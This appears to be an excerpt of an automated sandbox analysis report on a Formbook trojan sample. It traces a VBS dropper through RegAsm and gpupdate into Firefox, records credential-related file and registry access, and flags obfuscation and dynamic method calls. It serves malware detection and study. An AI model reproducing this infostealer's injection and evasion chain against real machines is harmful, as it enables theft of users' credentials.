            Source: 00000003.00000002.495204782.0000000005700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: temp_file_rhjRS.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: temp_file_rhjRS.exe.0.dr, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
            Source: temp_file_rhjRS.exe.0.dr, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
            Source: temp_file_rhjRS.exe.0.dr, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
            Source: temp_file_rhjRS.exe.0.dr, AesUtilities.csCryptographic APIs: 'CreateDecryptor'
            Source: wscript.exe, 00000000.00000003.371945604.0000000004DE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LShYY&&&/xPX9be6zpL~~S...r**bmC+c...D75gl9C/...sLnL7kwPI86U1UHfkforLjwAOWyyXg6s+@@XSSKC+u::S3Xz1PD2O~~D6c...1xnZX8sA9Zje9kdcn9::PmkIv4K...2kt88e6~~3e0d::PH07+LLxD@@cenLo+0ax5dzt...hIaP+HeGgEy9NtqcyF
            Source: wscript.exe, 00000000.00000003.366911724.000000000522E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367360564.0000000004D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367391975.0000000004D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.366951200.000000000527A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367864851.0000000004E71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.366706803.0000000005142000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367459446.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367092750.000000000527D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.366917421.0000000005269000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367713048.0000000004E3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367422339.0000000004D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3ingxr900zd~~kz...WCk5d))LShYY&&&/xPX9be6zpL~~S...r**bmC+c...D75gl9C/...sLnL7kwPI86U1UHfkforLjw
            Source: wscript.exe, 00000000.00000003.368939556.0000000004DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.369634169.0000000004DD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.369046764.0000000004DC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371468837.0000000004DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LShYY&&&/xPX9be6zpL~~S...r**bmC+c...D75gl9C/...sLnL7kwPI86U1UHfkforLjwAOWyyXg6s+@@XSSKC+u::S3Xz1PD2O~~D6c...1xnZX8sA9Zje9kdcn9::PmkIv4K...2kt88e6~~3e0d::PH07+LLxD@@cenLo+0ax5dzt...hIaP+HeGgEy9NtqcyF[
            Source: wscript.exe, 00000000.00000003.372865441.0000000004D9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.373006966.0000000004DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.372747849.0000000004D90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.373160010.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Osu0a5&&&ZOZksa879uAU~~WhqW1A3ingxr900zd~~kz...WCk5dTLShYY&&&/xPX9be6zpL~~S...r**bmC+c...D75gl9C/...sLnL7kwPI86U1UHfkforLjwAOWyyXg6s+)
            Source: wscript.exe, 00000000.00000003.372791530.00000000051F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.373265688.0000000005242000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.372815806.0000000005212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Osu0a5&&&ZOZksa879uAU~~WhqW1A3ingxr900zd~~kz...WCk5dTLShYY&&&/xPX9be6zpL~~S...r**bmC+c...D75gl9C/...sLnL7kwPI86U1UHfkforLjwAOWyyXg6s+
            Source: wscript.exe, 00000000.00000003.371672917.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.369070708.0000000004F7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LShYY&&&/xPX9be6zpL~~S...r**bmC+c...D75gl9C/...sLnL7kwPI86U1UHfkforLjwAOWyyXg6s+@@XSSKC+u::S3Xz1PD2O~~D6c...1xnZX8sA9Zje9kdcn9::PmkIv4K...2kt88e6~~3e0d::PH07+LLxD@@cenLo+0ax5dzt...hIaP+HeGgEy9NtqcyF#
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@9/6@4/4
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeMutant created: NULL
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0CkEHZjZgO.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0CkEHZjZgO.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe"
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeProcess created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\SysWOW64\gpupdate.exe"
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeProcess created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\SysWOW64\gpupdate.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: wevtapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: riched32.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 0CkEHZjZgO.vbsStatic file information: File size 1316012 > 1048576
            Source: Binary string: wntdll.pdb source: RegAsm.exe

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: temp_file_rhjRS.exe.0.dr, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.fEDRFoeYWQtM9(16777253)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.fEDRFoeYWQtM9(16777254)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.fEDRFoeYWQtM9(16777251))})
            Source: temp_file_rhjRS.exe.0.drStatic PE information: 0xDDFB4110 [Tue Jan 6 12:35:28 2088 UTC]
            Source: sqlite3.dll.5.drStatic PE information: section name: /4
            Source: sqlite3.dll.5.drStatic PE information: section name: /19
            Source: sqlite3.dll.5.drStatic PE information: section name: /31
            Source: sqlite3.dll.5.drStatic PE information: section name: /45
            Source: sqlite3.dll.5.drStatic PE information: section name: /57
            Source: sqlite3.dll.5.drStatic PE information: section name: /70
            Source: sqlite3.dll.5.drStatic PE information: section name: /81
            Source: sqlite3.dll.5.drStatic PE information: section name: /92
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeCode function: 2_2_004F1796 push esi; iretd 2_2_004F1797
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00414044 push CC948A01h; retf 3_2_00414074
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004030E0 push eax; ret 3_2_004030E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041488D pushfd ; iretd 3_2_0041488F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418099 push FFFFFFD1h; retf 3_2_0041809B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401966 push esi; iretd 3_2_00401967
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00402179 push ss; retf 3_2_0040213D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415AE7 pushad ; ret 3_2_00415AE9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D4C7 push edx; ret 3_2_0040D514
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D4CD push edx; ret 3_2_0040D514
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004154B9 push edi; retf 3_2_004154BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418DD0 push ebp; ret 3_2_00418DE6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D589 push edx; ret 3_2_0040D514
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004116BB push edi; retf 3_2_004116BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00417F21 push cs; iretd 3_2_00417F24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00413FC3 push edi; ret 3_2_00413FCE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0221DFA1 push ecx; ret 3_2_0221DFB4
            Source: temp_file_rhjRS.exe.0.drStatic PE information: section name: .text entropy: 7.96091556404526
            Source: temp_file_rhjRS.exe.0.dr, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'MwXRFo0eU7OUA', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
            Source: temp_file_rhjRS.exe.0.dr, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeJump to dropped file
            Source: C:\Windows\SysWOW64\gpupdate.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
